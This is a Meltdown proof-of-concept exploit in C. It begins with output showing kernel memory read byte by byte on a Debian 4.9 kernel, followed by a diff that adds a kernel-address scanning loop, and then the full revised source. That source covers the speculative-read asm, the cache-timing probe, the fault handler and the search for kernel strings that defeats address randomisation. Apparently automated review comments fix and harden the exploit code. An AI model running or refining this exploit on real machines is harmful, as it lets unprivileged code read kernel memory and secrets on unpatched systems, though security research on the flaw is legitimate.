read ffffffffaec00045 = 67 g (score=985/1000)
read ffffffffaec00046 = ff   (score=0/1000)
read ffffffffaec00047 = ff   (score=0/1000)
read ffffffffaec00048 = ff   (score=0/1000)
read ffffffffaec00049 = ff   (score=0/1000)
read ffffffffaec0004a = ff   (score=0/1000)
read ffffffffaec0004b = ff   (score=0/1000)
read ffffffffaec0004c = ff   (score=0/1000)
read ffffffffaec0004d = ff   (score=0/1000)
read ffffffffaec0004e = ff   (score=0/1000)
read ffffffffaec0004f = ff   (score=0/1000)
read ffffffffaec00050 = ff   (score=0/1000)
read ffffffffaec00051 = ff   (score=0/1000)
read ffffffffaec00052 = ff   (score=0/1000)
read ffffffffaec00053 = ff   (score=0/1000)
read ffffffffaec00054 = ff   (score=0/1000)
read ffffffffaec00055 = ff   (score=0/1000)
read ffffffffaec00056 = ff   (score=0/1000)
read ffffffffaec00057 = ff   (score=0/1000)
read ffffffffaec00058 = ff   (score=0/1000)
read ffffffffaec00059 = ff   (score=0/1000)
read ffffffffaec0005a = ff   (score=0/1000)
read ffffffffaec0005b = ff   (score=0/1000)
read ffffffffaec0005c = ff   (score=0/1000)
read ffffffffaec0005d = ff   (score=0/1000)
read ffffffffaec0005e = ff   (score=0/1000)
read ffffffffaec0005f = ff   (score=0/1000)
read ffffffffaec00060 = 25 % (score=989/1000)
read ffffffffaec00061 = 73 s (score=991/1000)
read ffffffffaec00062 = 20   (score=947/1000)
read ffffffffaec00063 = 76 v (score=957/1000)
read ffffffffaec00064 = 65 e (score=502/1000)
read ffffffffaec00065 = 72 r (score=994/1000)
read ffffffffaec00066 = 73 s (score=990/1000)
read ffffffffaec00067 = 69 i (score=987/1000)
read ffffffffaec00068 = 6f o (score=990/1000)
read ffffffffaec00069 = 6e n (score=876/1000)
read ffffffffaec0006a = 20   (score=951/1000)
read ffffffffaec0006b = 25 % (score=990/1000)
read ffffffffaec0006c = 73 s (score=993/1000)
read ffffffffaec0006d = 20   (score=923/1000)
read ffffffffaec0006e = 28 ( (score=985/1000)
read ffffffffaec0006f = 64 d (score=982/1000)
read ffffffffaec00070 = 65 e (score=316/1000)
read ffffffffaec00071 = 62 b (score=979/1000)
read ffffffffaec00072 = 69 i (score=988/1000)
read ffffffffaec00073 = 61 a (score=975/1000)
read ffffffffaec00074 = 6e n (score=732/1000)
read ffffffffaec00075 = 2d - (score=910/1000)
read ffffffffaec00076 = 6b k (score=986/1000)
read ffffffffaec00077 = 65 e (score=455/1000)
read ffffffffaec00078 = 72 r (score=989/1000)
read ffffffffaec00079 = 6e n (score=747/1000)
read ffffffffaec0007a = 65 e (score=412/1000)
read ffffffffaec0007b = 6c l (score=112/1000)
read ffffffffaec0007c = 40 @ (score=150/1000)
read ffffffffaec0007d = 6c l (score=102/1000)
read ffffffffaec0007e = 69 i (score=987/1000)
read ffffffffaec0007f = 73 s (score=990/1000)
read ffffffffaec00080 = 74 t (score=995/1000)
read ffffffffaec00081 = 73 s (score=989/1000)
read ffffffffaec00082 = 2e . (score=781/1000)
read ffffffffaec00083 = 64 d (score=994/1000)
read ffffffffaec00084 = 65 e (score=766/1000)
read ffffffffaec00085 = 62 b (score=974/1000)
read ffffffffaec00086 = 69 i (score=996/1000)
read ffffffffaec00087 = 61 a (score=984/1000)
read ffffffffaec00088 = 6e n (score=741/1000)
read ffffffffaec00089 = 2e . (score=701/1000)
read ffffffffaec0008a = 6f o (score=989/1000)
read ffffffffaec0008b = 72 r (score=995/1000)
read ffffffffaec0008c = 67 g (score=993/1000)
read ffffffffaec0008d = 29 ) (score=934/1000)
read ffffffffaec0008e = 20   (score=892/1000)
read ffffffffaec0008f = 28 ( (score=989/1000)
read ffffffffaec00090 = 67 g (score=993/1000)
read ffffffffaec00091 = 63 c (score=983/1000)
read ffffffffaec00092 = 63 c (score=980/1000)
read ffffffffaec00093 = 20   (score=917/1000)
read ffffffffaec00094 = 76 v (score=928/1000)
read ffffffffaec00095 = 65 e (score=332/1000)
read ffffffffaec00096 = 72 r (score=996/1000)
read ffffffffaec00097 = 73 s (score=986/1000)
read ffffffffaec00098 = 69 i (score=979/1000)
read ffffffffaec00099 = 6f o (score=990/1000)
read ffffffffaec0009a = 6e n (score=742/1000)
read ffffffffaec0009b = 20   (score=931/1000)
read ffffffffaec0009c = 36 6 (score=968/1000)
read ffffffffaec0009d = 2e . (score=580/1000)
read ffffffffaec0009e = 33 3 (score=988/1000)
read ffffffffaec0009f = 2e . (score=524/1000)
read ffffffffaec000a0 = 30 0 (score=984/1000)
read ffffffffaec000a1 = 20   (score=903/1000)
read ffffffffaec000a2 = 32 2 (score=963/1000)
read ffffffffaec000a3 = 30 0 (score=983/1000)
read ffffffffaec000a4 = 31 1 (score=994/1000)
read ffffffffaec000a5 = 37 7 (score=953/1000)
read ffffffffaec000a6 = 30 0 (score=987/1000)
read ffffffffaec000a7 = 35 5 (score=843/1000)
read ffffffffaec000a8 = 31 1 (score=996/1000)
read ffffffffaec000a9 = 36 6 (score=950/1000)
read ffffffffaec000aa = 20   (score=958/1000)
read ffffffffaec000ab = 28 ( (score=991/1000)
read ffffffffaec000ac = 44 D (score=297/1000)
read ffffffffaec000ad = 65 e (score=642/1000)
read ffffffffaec000ae = 62 b (score=979/1000)
read ffffffffaec000af = 69 i (score=994/1000)
read ffffffffaec000b0 = 61 a (score=982/1000)
read ffffffffaec000b1 = 6e n (score=751/1000)
read ffffffffaec000b2 = 20   (score=946/1000)
read ffffffffaec000b3 = 36 6 (score=963/1000)
read ffffffffaec000b4 = 2e . (score=511/1000)
read ffffffffaec000b5 = 33 3 (score=988/1000)
read ffffffffaec000b6 = 2e . (score=624/1000)
read ffffffffaec000b7 = 30 0 (score=987/1000)
read ffffffffaec000b8 = 2d - (score=943/1000)
read ffffffffaec000b9 = 31 1 (score=994/1000)
read ffffffffaec000ba = 38 8 (score=981/1000)
read ffffffffaec000bb = 29 ) (score=893/1000)
read ffffffffaec000bc = 20   (score=930/1000)
read ffffffffaec000bd = 29 ) (score=964/1000)
read ffffffffaec000be = 20   (score=918/1000)
read ffffffffaec000bf = 25 % (score=992/1000)
read ffffffffaec000c0 = 73 s (score=991/1000)
read ffffffffaec000c1 = ff   (score=0/1000)
read ffffffffaec000c2 = ff   (score=0/1000)
read ffffffffaec000c3 = ff   (score=0/1000)
read ffffffffaec000c4 = ff   (score=0/1000)
read ffffffffaec000c5 = ff   (score=0/1000)
read ffffffffaec000c6 = ff   (score=0/1000)
read ffffffffaec000c7 = ff   (score=0/1000)
read ffffffffaec000c8 = ff   (score=0/1000)
read ffffffffaec000c9 = ff   (score=0/1000)
read ffffffffaec000ca = ff   (score=0/1000)
read ffffffffaec000cb = ff   (score=0/1000)
read ffffffffaec000cc = ff   (score=0/1000)
read ffffffffaec000cd = ff   (score=0/1000)
read ffffffffaec000ce = ff   (score=0/1000)
read ffffffffaec000cf = ff   (score=0/1000)
read ffffffffaec000d0 = ff   (score=0/1000)
read ffffffffaec000d1 = ff   (score=0/1000)
read ffffffffaec000d2 = ff   (score=0/1000)
read ffffffffaec000d3 = ff   (score=0/1000)
read ffffffffaec000d4 = ff   (score=0/1000)
read ffffffffaec000d5 = ff   (score=0/1000)
read ffffffffaec000d6 = ff   (score=0/1000)
read ffffffffaec000d7 = ff   (score=0/1000)
read ffffffffaec000d8 = ff   (score=0/1000)
read ffffffffaec000d9 = ff   (score=0/1000)
read ffffffffaec000da = ff   (score=0/1000)
read ffffffffaec000db = ff   (score=0/1000)
read ffffffffaec000dc = ff   (score=0/1000)
read ffffffffaec000dd = ff   (score=0/1000)
read ffffffffaec000de = ff   (score=0/1000)
read ffffffffaec000df = ff   (score=0/1000)
read ffffffffaec000e0 = 4c L (score=918/1000)
read ffffffffaec000e1 = 69 i (score=992/1000)
read ffffffffaec000e2 = 6e n (score=833/1000)
read ffffffffaec000e3 = 75 u (score=363/1000)
read ffffffffaec000e4 = 78 x (score=902/1000)
read ffffffffaec000e5 = 20   (score=940/1000)
read ffffffffaec000e6 = 76 v (score=940/1000)
read ffffffffaec000e7 = 65 e (score=347/1000)
read ffffffffaec000e8 = 72 r (score=994/1000)
read ffffffffaec000e9 = 73 s (score=995/1000)
read ffffffffaec000ea = 69 i (score=994/1000)
read ffffffffaec000eb = 6f o (score=984/1000)
read ffffffffaec000ec = 6e n (score=674/1000)
read ffffffffaec000ed = 20   (score=921/1000)
read ffffffffaec000ee = 34 4 (score=987/1000)
read ffffffffaec000ef = 2e . (score=497/1000)
read ffffffffaec000f0 = 39 9 (score=598/1000)
read ffffffffaec000f1 = 2e . (score=627/1000)
read ffffffffaec000f2 = 30 0 (score=982/1000)
read ffffffffaec000f3 = 2d - (score=921/1000)
read ffffffffaec000f4 = 33 3 (score=986/1000)
read ffffffffaec000f5 = 2d - (score=936/1000)
read ffffffffaec000f6 = 61 a (score=976/1000)
read ffffffffaec000f7 = 6d m (score=976/1000)
read ffffffffaec000f8 = 64 d (score=986/1000)
read ffffffffaec000f9 = 36 6 (score=965/1000)
read ffffffffaec000fa = 34 4 (score=994/1000)
read ffffffffaec000fb = 20   (score=956/1000)
read ffffffffaec000fc = 28 ( (score=985/1000)
read ffffffffaec000fd = 64 d (score=982/1000)
read ffffffffaec000fe = 65 e (score=333/1000)
read ffffffffaec000ff = 62 b (score=981/1000)
Dumped: ����������������������������������������������������������������_debug��������������������������%s version %s ([email protected]) (gcc version 6.3.0 20170516 (Debian 6.3.0-18) ) %s�������������������������������Linux version 4.9.0-3-amd64 (deb
offset: 0x41 ; found __param_str_initcall_debug: ffffffffaec00041

Diff

diff --git a/meltdown.c b/meltdown.c
index 5cea383..90bd92e 100644
--- a/meltdown.c
+++ b/meltdown.c
@@ -234,9 +234,7 @@ static void pin_cpu0()
 
 int main(int argc, char *argv[])
 {
-	int ret, fd, i, score, is_vulnerable;
 	unsigned long addr, size;
-	static char expected[] = "%s version %s";
 
 	progname = argv[0];
 	if (argc < 3)
@@ -248,6 +246,18 @@ int main(int argc, char *argv[])
 	if (sscanf(argv[2], "%lx", &size) != 1)
 		return usage();
 
+	unsigned long step = 0x100000;
+	unsigned long addr_max = 0xffffffffffffffff;
+	unsigned long i;
+	for (i = addr; i < addr_max; i += step) {
+		if (leak(i, size)) break;
+	}
+}
+
+int leak(unsigned long addr, unsigned long size) {
+	int ret, fd, i, score, is_vulnerable;
+	static char expected[] = "%s version %s";
+
 	memset(target_array, 1, sizeof(target_array));
 
 	ret = set_signal();
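Review bot: `leak()` is called from `main()` before any declaration of it exists (its definition only starts further down in this hunk), so the call relies on an implicit function declaration, which C99 removed and current compilers reject; add `int leak(unsigned long addr, unsigned long size);` above `main`. The loop condition `i < addr_max` with `addr_max = 0xffffffffffffffff` holds for every reachable value of `i`, and `i += step` eventually wraps past ULONG_MAX to 0, so the scan restarts at address 0 instead of stopping; a guard such as `if (addr_max - i < step) break;` at the end of the body terminates it. `main` also now falls off its closing brace without a `return`, which C99 tolerates for `main` alone. The body of `leak()` continues in the following hunks.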
@@ -261,6 +271,10 @@ int main(int argc, char *argv[])
 		return -1;
 	}
 
+	char buf[1024];
+	buf[0] = '\0';
+
+	unsigned long start = addr;
 	for (score = 0, i = 0; i < size; i++) {
 		ret = readbyte(fd, addr);
 		if (ret == -1)
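Review bot: `buf` is 1024 bytes but nothing ties it to `size`, which comes straight from `argv[2]`, so the per-byte append in the next hunk writes past the end of `buf` whenever `size` is 1024 or more. Clamp before the loop, e.g. `if (size > sizeof(buf) - 1) size = sizeof(buf) - 1;`, or size the buffer from `size`. The enclosing `leak()` starts in the previous hunk and continues past this one.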
@@ -270,6 +284,8 @@ int main(int argc, char *argv[])
 		       ret != 0xff ? hist[ret] : 0,
 		       CYCLES);
 
+		strncat(buf, &ret, 1);
+
 		if (i < sizeof(expected) &&
 		    ret == expected[i])
 			score++;
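Review bot: `strncat(buf, &ret, 1)` passes an `int *` where `const char *` is expected; it compiles only with an incompatible-pointer warning and copies the first byte of `ret`'s object representation, which is the intended low byte only on little-endian targets. Since the loop already has the index, a direct store is both correct and O(1) per byte: `buf[i] = (char)ret; buf[i + 1] = '\0';` (with `buf` bounded against `size`). `leak()` starts and ends outside this hunk.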
@@ -277,14 +293,35 @@ int main(int argc, char *argv[])
 		addr++;
 	}
 
+	printf("Dumped: %s\n", buf);
+
+	char * found;
+
+	found = strstr(buf, "debug");
+	unsigned long offset;
+	if (found) {
+		offset = found - buf;
+		printf("offset: %p ; found __param_str_initcall_debug: %lx\n", offset, (offset + (unsigned long)start));
+		return 1;
+	}
+
+	found = strstr(buf, expected);
+	if (found) {
+		offset = found - buf;
+		printf("offset: %p ; found linux_proc_banner: %lx\n", offset, (offset + (unsigned long)start));
+		return 1;
+	}
+
 	close(fd);
 
 	is_vulnerable = score > min(size, sizeof(expected)) / 2;
 
-	if (is_vulnerable)
+	if (is_vulnerable) {
 		fprintf(stderr, "VULNERABLE\n");
+		exit(is_vulnerable);
+	}
 	else
 		fprintf(stderr, "NOT VULNERABLE\n");
 
-	exit(is_vulnerable);
+	return is_vulnerable;
 }
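Review bot: Both `printf("offset: %p ...", offset, ...)` calls pass an `unsigned long` for `%p`, a format/argument mismatch that is undefined behaviour (and flagged by -Wformat); print the offset as `0x%lx` instead. The two `return 1` branches also leave `/proc/version` open because `close(fd)` sits below them; moving the `close(fd);` up to just before `printf("Dumped: %s\n", buf);` covers every path. The VULNERABLE branch now calls `exit(is_vulnerable)` inside `leak()` while the NOT VULNERABLE path returns, so `main()`'s loop only ever observes the latter; returning in both cases and letting `main()` decide would keep the control flow in one place. `leak()` starts outside this hunk.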

Source

#define _GNU_SOURCE

#include <ctype.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ucontext.h>
#include <unistd.h>

#include <x86intrin.h>

#include "rdtscp.h"

//#define DEBUG 1


#if !(defined(__x86_64__) || defined(__i386__))
# error "Only x86-64 and i386 are supported at the moment"
#endif


/* Stride between probe slots: 1 << 12 = 4096 bytes, one slot per byte value. */
#define TARGET_OFFSET	12
#define TARGET_SIZE	(1 << TARGET_OFFSET)
/* One byte is recovered at a time, so 1 << 8 = 256 candidate values. */
#define BITS_READ	8
#define VARIANTS_READ	(1 << BITS_READ)

/* Probe array: 256 slots of 4096 bytes (1 MiB).  speculate() touches slot
 * `byte` for the byte it read, and check() times every slot to find out
 * which one is cached. */
static char target_array[VARIANTS_READ * TARGET_SIZE];

/* Evict every probe slot of target_array from the cache.  readbyte() calls
 * this before each speculate()/check() round so that a slot only reads back
 * as cached if that round touched it. */
void clflush_target(void)
{
	char *slot = target_array;
	int remaining = VARIANTS_READ;

	while (remaining-- > 0) {
		_mm_clflush(slot);
		slot += TARGET_SIZE;
	}
}

/*
 * Global asm label placed right after the probing load in speculate(); the
 * SIGSEGV handler (sigsegv()) rewrites the faulting context's RIP/EIP to this
 * address so execution resumes past the asm block instead of the process
 * dying.
 */
extern char stopspeculate[];

/*
 * Meltdown probe for one byte: read the byte at addr and, with the value
 * scaled by TARGET_SIZE (1 << 12), touch one slot of target_array.
 *
 * addr is normally a kernel address, so the read faults; whatever slot got
 * touched is left behind in the cache and check() later times every slot to
 * see which one it was.  There are no output operands: the loaded values are
 * discarded architecturally.  noinline keeps the asm in one place, which
 * matters because the block defines the global label stopspeculate and a
 * second copy would be a duplicate symbol.
 */
static void __attribute__((noinline))
speculate(unsigned long addr)
{
#ifdef __x86_64__
	asm volatile (
		"1:\n\t"

		/* 300 dependent adds on rax: filler ahead of the faulting load. */
		".rept 300\n\t"
		"add $0x141, %%rax\n\t"
		".endr\n\t"

		/* The faulting read: zero-extend the byte at addr into eax. */
		"movzx (%[addr]), %%eax\n\t"
		/* byte * 4096 == byte * TARGET_SIZE: one probe slot per value. */
		"shl $12, %%rax\n\t"
		/* Value 0 would select slot 0, which readbyte() never counts
		 * (its scan starts at 1); jump back to the top instead. */
		"jz 1b\n\t"
		/* Touch target_array[byte * TARGET_SIZE]; the loaded value is
		 * irrelevant, only the cache-line fill matters. */
		"movzx (%[target], %%rax, 1), %%rbx\n"

		/* Resume point used by sigsegv() after the fault. */
		"stopspeculate: \n\t"
		"nop\n\t"
		:
		: [target] "r" (target_array),
		  [addr] "r" (addr)
		: "rax", "rbx"
	);
#else /* ifdef __x86_64__ */
	/* 32-bit twin of the block above, using eax/ebx. */
	asm volatile (
		"1:\n\t"

		".rept 300\n\t"
		"add $0x141, %%eax\n\t"
		".endr\n\t"

		"movzx (%[addr]), %%eax\n\t"
		"shl $12, %%eax\n\t"
		"jz 1b\n\t"
		"movzx (%[target], %%eax, 1), %%ebx\n"


		"stopspeculate: \n\t"
		"nop\n\t"
		:
		: [target] "r" (target_array),
		  [addr] "r" (addr)
		/* NOTE(review): the clobbers are spelled "rax"/"rbx" here as
		 * well — confirm the i386 toolchain accepts the 64-bit names. */
		: "rax", "rbx"
	);
#endif
}


/* Access-time threshold (in whatever unit get_access_time() from rdtscp.h
 * returns) at or below which a probe counts as a cache hit; filled in by
 * set_cache_hit_threshold(). */
static int cache_hit_threshold;
/* Per-byte-value hit counters; readbyte() zeroes them before every round. */
static int hist[VARIANTS_READ];

/* Time each probe slot of target_array and bump hist[] for every slot that
 * reads back at or below cache_hit_threshold.  Slots are visited in the
 * scrambled order (i * 167 + 13) mod 256 rather than sequentially. */
void check(void)
{
	int n;

	for (n = 0; n < VARIANTS_READ; n++) {
		int slot = (n * 167 + 13) & 255;
		volatile char *probe = &target_array[slot * TARGET_SIZE];
		int ticks = get_access_time(probe);

		if (ticks <= cache_hit_threshold)
			hist[slot]++;
	}
}

/* SIGSEGV handler installed by set_signal().  The probing read in speculate()
 * faults on the kernel address; this handler moves the interrupted context's
 * instruction pointer to the stopspeculate label so the process resumes right
 * after the asm block instead of dying.  sig and siginfo are unused. */
void sigsegv(int sig, siginfo_t *siginfo, void *context)
{
	ucontext_t *uc = (ucontext_t *)context;
	unsigned long resume = (unsigned long)stopspeculate;

	(void)sig;
	(void)siginfo;

#ifdef __x86_64__
	uc->uc_mcontext.gregs[REG_RIP] = resume;
#else
	uc->uc_mcontext.gregs[REG_EIP] = resume;
#endif
}

/* Install sigsegv() as the SIGSEGV handler, with SA_SIGINFO so that it
 * receives the ucontext it rewrites.  Returns sigaction()'s result: 0 on
 * success, -1 on failure with errno set. */
int set_signal(void)
{
	struct sigaction act;

	memset(&act, 0, sizeof act);
	act.sa_sigaction = sigsegv;
	act.sa_flags = SA_SIGINFO;

	return sigaction(SIGSEGV, &act, NULL);
}

#define CYCLES 1000
/*
 * Recover one byte at addr.  Runs CYCLES rounds of: pread() from fd
 * (/proc/version, opened by leak(); presumably to keep the kernel's version
 * string cached), flush the probe array, fence, speculate(addr), then time
 * the slots with check().  The result is the printable byte value whose slot
 * was counted as cached most often over all rounds; -1 if no printable slot
 * registered a hit.  A failing pread() is reported and ends the rounds early.
 */
int readbyte(int fd, unsigned long addr)
{
	static char scratch[256];
	int round;
	int best_count = -1, best_byte = -1;

	memset(hist, 0, sizeof(hist));

	for (round = 0; round < CYCLES; round++) {
		if (pread(fd, scratch, sizeof(scratch), 0) < 0) {
			perror("pread");
			break;
		}

		clflush_target();
		_mm_mfence();
		speculate(addr);
		check();
	}

#ifdef DEBUG
	for (round = 0; round < VARIANTS_READ; round++)
		if (hist[round] > 0)
			printf("addr %lx hist[%x] = %d\n", addr, round, hist[round]);
#endif

	/* Slot 0 is skipped and only printable values compete. */
	for (int value = 1; value < VARIANTS_READ; value++) {
		if (!isprint(value) || hist[value] == 0)
			continue;
		if (hist[value] > best_count) {
			best_count = hist[value];
			best_byte = value;
		}
	}

	return best_byte;
}

/* argv[0], saved by main() for use in messages. */
static char *progname;

/* Print the command-line synopsis and return the status main() exits with
 * for bad arguments (2). */
int usage(void)
{
	const int bad_args = 2;

	fprintf(stdout, "%s: [hexaddr] [size]\n", progname);
	return bad_args;
}

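/*
 * Integer square root: floor(sqrt(val)) for val > 0, 0 for val <= 0.
 *
 * Newton's iteration started from val itself decreases monotonically to the
 * floor, so it terminates on its own and never oscillates between floor and
 * floor + 1 the way averaging from val / 2 with an iteration cap can
 * (val == 3 flipped between 1 and 2, val == 1 returned 0).  The first step
 * is written as val / 2 + val % 2 rather than (val + 1) / 2 to avoid
 * overflow at LONG_MAX.  Used by set_cache_hit_threshold() for the geometric
 * mean of the cached and uncached access times.
 */
static int mysqrt(long val)
{
	long x, y;

	if (val <= 0)
		return 0;

	x = val;
	y = x / 2 + x % 2;
	while (y < x) {
		x = y;
		y = (x + val / x) / 2;
	}

	return (int)x;
}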

#define ESTIMATE_CYCLES	1000000
/*
 * Calibrate cache_hit_threshold: time target_array[0] ESTIMATE_CYCLES times
 * while it is cached, then ESTIMATE_CYCLES times after flushing it before
 * each access, and take the integer geometric mean of the two averages
 * (mysqrt(cached * uncached)).  The cached measurement runs twice and only
 * the second total is kept; the first pass presumably serves as a warm-up.
 * The `if (0)` block is a disabled hard-coded override (80) left in for
 * experimentation.  Prints the two averages and the threshold to stdout.
 */
static void set_cache_hit_threshold(void)
{
	long sum_cached = 0, sum_uncached = 0;
	int pass;
	long n;

	if (0) {
		cache_hit_threshold = 80;
		return;
	}

	/* Two passes; only the second pass's total survives. */
	for (pass = 0; pass < 2; pass++) {
		sum_cached = 0;
		for (n = 0; n < ESTIMATE_CYCLES; n++)
			sum_cached += get_access_time(target_array);
	}

	for (n = 0; n < ESTIMATE_CYCLES; n++) {
		_mm_clflush(target_array);
		sum_uncached += get_access_time(target_array);
	}

	sum_cached /= ESTIMATE_CYCLES;
	sum_uncached /= ESTIMATE_CYCLES;

	cache_hit_threshold = mysqrt(sum_cached * sum_uncached);

	printf("cached = %ld, uncached = %ld, threshold %d\n",
	       sum_cached, sum_uncached, cache_hit_threshold);
}

/* Smaller of two ints; leak() uses it to cap the score denominator. */
static int min(int a, int b)
{
	if (b < a)
		return b;
	return a;
}

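/*
 * Pin the calling thread to CPU 0, presumably so that the timing
 * measurements in speculate()/check() all happen on one core.  A failing
 * sched_setaffinity() is reported on stderr but is not fatal: the probe
 * simply proceeds unpinned.  (Previously the return value was ignored.)
 */
static void pin_cpu0(void)
{
	cpu_set_t mask;

	CPU_ZERO(&mask);
	CPU_SET(0, &mask);
	if (sched_setaffinity(0, sizeof(mask), &mask) != 0)
		perror("sched_setaffinity");
}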

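/* Defined below; declared here so main() does not rely on an implicit
 * function declaration (removed in C99, a hard error in newer compilers). */
int leak(unsigned long addr, unsigned long size);

/*
 * Usage: progname <hexaddr> <size>.  Starting at hexaddr, call leak() on
 * `size` bytes at every 0x100000 step until leak() reports a hit or the
 * address space is exhausted.
 *
 * Returns 0 when leak() reported a marker (1), 1 when leak() failed (-1) or
 * the scan reached the top of the address space without a hit, and usage()'s
 * status (2) for bad arguments.  leak() itself exits the process with status
 * 1 from its VULNERABLE branch.
 *
 * The loop guards against `cur + step` wrapping: the old condition
 * `i < 0xffffffffffffffff` held for every reachable value and the increment
 * wrapped to 0, restarting the scan at address 0 instead of stopping.
 */
int main(int argc, char *argv[])
{
	unsigned long addr, size;
	const unsigned long step = 0x100000;
	const unsigned long addr_max = ~0UL;	/* ULONG_MAX on this target */

	progname = argv[0];
	if (argc < 3)
		return usage();

	if (sscanf(argv[1], "%lx", &addr) != 1)
		return usage();

	if (sscanf(argv[2], "%lx", &size) != 1)
		return usage();

	for (unsigned long cur = addr; cur < addr_max; cur += step) {
		int rc = leak(cur, size);

		if (rc < 0)
			return 1;	/* could not open /proc/version or install the handler */
		if (rc)
			return 0;	/* marker found; leak() printed where */

		/* Stop before the increment would wrap past addr_max. */
		if (addr_max - cur < step)
			break;
	}

	return 1;
}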

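/*
 * Probe `size` bytes starting at kernel address `addr` and look for a known
 * kernel string in what came back.
 *
 * Each byte is recovered with readbyte() (an unreadable byte, -1, is
 * recorded as 0xff) and echoed as "read <addr> = <hex> <char> (score=...)".
 * The recovered bytes are collected in a local buffer — at most
 * sizeof(buf) - 1 of them; a larger `size` is clamped and reported on
 * stderr — and then searched for "debug" (taken to be
 * __param_str_initcall_debug) and for the "%s version %s" prefix of
 * linux_proc_banner.  `score` counts leading bytes that match that prefix.
 *
 * Returns 1 when a marker was found (its offset and absolute address are
 * printed), -1 when the SIGSEGV handler cannot be installed or /proc/version
 * cannot be opened, and 0 otherwise.  When no marker was found but the score
 * suggests the read worked, prints VULNERABLE and terminates the process via
 * exit(1); otherwise prints NOT VULNERABLE and returns 0.
 *
 * Fixes relative to the earlier version: the per-byte append no longer
 * passes an int * as a string or overruns buf, the offset is printed with
 * %lx instead of %p, fd is closed on every path, and set_signal()'s result
 * is checked.
 */
int leak(unsigned long addr, unsigned long size)
{
	static const char expected[] = "%s version %s";
	const unsigned long start = addr;
	char buf[1024];
	unsigned long i;
	int fd, score = 0, is_vulnerable;
	char *found;

	memset(target_array, 1, sizeof(target_array));

	/* Without the handler the first faulting read in speculate() would
	 * kill the process. */
	if (set_signal() != 0) {
		perror("sigaction");
		return -1;
	}
	pin_cpu0();

	set_cache_hit_threshold();

	fd = open("/proc/version", O_RDONLY);
	if (fd < 0) {
		perror("open");
		return -1;
	}

	/* buf holds one char per probed byte plus the terminator. */
	if (size > sizeof(buf) - 1) {
		fprintf(stderr, "size clamped to %zu bytes\n", sizeof(buf) - 1);
		size = sizeof(buf) - 1;
	}

	for (i = 0; i < size; i++, addr++) {
		int ret = readbyte(fd, addr);

		if (ret == -1)
			ret = 0xff;
		printf("read %lx = %x %c (score=%d/%d)\n",
		       addr, ret, isprint(ret) ? ret : ' ',
		       ret != 0xff ? hist[ret] : 0,
		       CYCLES);

		/* readbyte() never returns 0, so no embedded NUL ends up in buf. */
		buf[i] = (char)ret;

		/* sizeof(expected) includes the NUL, which never matches. */
		if (i < sizeof(expected) && ret == expected[i])
			score++;
	}
	buf[i] = '\0';

	close(fd);

	printf("Dumped: %s\n", buf);

	found = strstr(buf, "debug");
	if (found) {
		unsigned long offset = (unsigned long)(found - buf);

		printf("offset: 0x%lx ; found __param_str_initcall_debug: %lx\n",
		       offset, offset + start);
		return 1;
	}

	found = strstr(buf, expected);
	if (found) {
		unsigned long offset = (unsigned long)(found - buf);

		printf("offset: 0x%lx ; found linux_proc_banner: %lx\n",
		       offset, offset + start);
		return 1;
	}

	/* size is at most sizeof(buf) - 1 here, so the int casts are exact. */
	is_vulnerable = score > min((int)size, (int)sizeof(expected)) / 2;

	if (is_vulnerable) {
		fprintf(stderr, "VULNERABLE\n");
		exit(is_vulnerable);
	}

	fprintf(stderr, "NOT VULNERABLE\n");
	return 0;
}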